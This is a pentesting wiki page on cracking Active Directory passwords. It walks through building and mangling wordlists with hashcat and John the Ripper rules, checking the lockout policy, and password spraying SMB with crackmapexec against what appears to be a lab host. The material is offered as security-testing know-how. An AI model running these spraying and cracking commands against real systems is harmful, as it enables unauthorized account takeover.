❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Take a wordlist
  • Building Yp Own Passowrd Wordlist
  • Rules Mangling with
  • hashcat
  • John The Ripper
  • Account Policy
  • Start to crack with
  • Crackmapexec smb

Was this helpful?

  1. Infrastructure Pentesting
  2. Active Directory (AD)

Password Cracking

Infra password cracking - Build your own wordlist that fits

PreviousAzure Active DirectoryNextDomain Enumeration

Last updated 1 year ago

Was this helpful?

Take a wordlist

for example staticticaly meaningful

wget https://raw.githubusercontent.com/insidetrust/statistically-likely-
usernames/master/weak-corporate-passwords/english-basic.txt
cat users.txt >> english-basic.txt

or build your own based on user enumeration (SMB, RPC, WEB)

Building Yp Own Passowrd Wordlist

usernames including admins
seasons
password
<empty>

Rules Mangling with

Enrich your wordlist by rules, add a bit of that, reverse, mangle...

hashcat

hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.list

John The Ripper

john hashes --wordlist=mywordlist --rules=MyRuleSet

where rule file /etc/john/john.conf

[List.Rules:MyRuleSet]
Az"[0-9][0-9][0-9][0-9]"

[List.Rules:Toggle]
T0
T1
T2
T0T1
T1T2
T0T2
T0T1T2
 
[List.Rules:Double]
d
p5
 
[List.Rules:Reflect]
f
 
[List.Rules:Reverse]
r

Now you have a wordlists that fits, be prepared for online password attack by checking...

Account Policy

Determine the account policy on your infra Active Directory before you start to lock out accounts

crackmapexec smb 10.129.228.111 --pass-pol

Start to crack with

Crackmapexec smb

# usernames only
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt  --continue-on-success

# with custom pass list
crackmapexec smb 10.129.228.111 -u users.txt -p pass.lst
rule_based_attack [hashcat wiki]
Comprehensive Guide to John the Ripper. Part 5: Rule-based attackEthical hacking and penetration testing
Logo
Logo